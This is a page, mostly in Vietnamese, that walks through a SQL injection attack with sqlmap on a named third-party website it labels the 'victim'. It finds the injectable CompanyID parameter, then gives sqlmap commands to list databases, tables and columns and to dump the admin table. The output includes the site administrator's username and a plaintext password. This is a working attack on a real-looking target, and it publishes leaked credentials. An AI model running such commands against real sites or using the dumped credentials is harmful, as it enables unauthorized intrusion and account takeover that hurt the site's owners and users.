5
SQL INJECTION EXPLOIT VICTIM: http://www.dkgbd.com TOOLS: SQLMAP (PYTHON) URL ANALYST: http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0 http:// PROTOCOL www.dkgbd.com DOMAIN Products.php RESOURCE ?LinkID=11&CompanyID=0 ?PARAMETER1=VALUE1&PARAMETER2=VALUE2 Kiểm tra SQL Injection bằng cách thêm ký tự sau VALUE : Ví dụ: http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0Khi ta thêm ‘ vào từng Value, thì value nào gây ra lỗi trên màn hình như hình dưới sẽ được dùng làm parameter để khai thác. Trong trường hợp này, parameter có tên CompanyID sẽ được chọn để khai thác SQLj. SQL STRUCTURE ANALYST:

SQLMAP

Embed Size (px)

Citation preview

Page 1: SQLMAP

SQL INJECTION EXPLOIT

VICTIM: http://www.dkgbd.comTOOLS: SQLMAP (PYTHON)

URL ANALYST:

http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0

http:// PROTOCOLwww.dkgbd.com DOMAINProducts.php RESOURCE?LinkID=11&CompanyID=0 ?PARAMETER1=VALUE1&PARAMETER2=VALUE2

Kiểm tra SQL Injection bằng cách thêm ký tự ‘ sau VALUE :

Ví dụ: http://www.dkgbd.com/Products.php?LinkID=11’&CompanyID=0’

Khi ta thêm ‘ vào từng Value, thì value nào gây ra lỗi trên màn hình như hình dưới sẽ được dùng làm parameter để khai thác. Trong trường hợp này, parameter có tên CompanyID sẽ được chọn để khai thác SQLj.

SQL STRUCTURE ANALYST:

DATABASES -> TABLES -> COLUMNS

Bước 1: Tìm databases

Page 2: SQLMAP

SYNTAX:sqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" --dbs

Figure 1: TA TÌM ĐƯỢC 02 DATABASES

Bước 2: Tìm tablesSYNTAXsqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" -D dkgroup --tables

Figure 2: Tables ta tìm được

Bước 3: Tìm columnsSYNTAX:sqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" -D dkgroup -T spec_admin --columns

Page 3: SQLMAP

Bước 4: Tìm giá trị lưu trữ trên từng columnSYNTAXsqlmap.py -u "http://www.dkgbd.com/Products.php?LinkID=11&CompanyID=0" -p "CompanyID" -D dkgroup -T spec_admin -columns --dump

Figure 3: PLAINTEXT PASSWORD

Database: dkgroupTable: spec_admin[1 entry]

+--------+---------+---------------+----------------+----+---------------------+--------------------+------------+| Active | AdminID | AdminPassword | Email | ID | LastVisit | Name | SuperAdmin |

+--------+---------+---------------+----------------+----+---------------------+--------------------+------------+| 1 | dkgbd | 19dkgbd | [email protected] | 1 | 2012-03-22 12:39:04 | DK Group Web Admin | 1 |

+--------+---------+---------------+----------------+----+---------------------+--------------------+------------+

BƯỚC 5: VERIFY

Page 4: SQLMAP

Figure 4: FINISH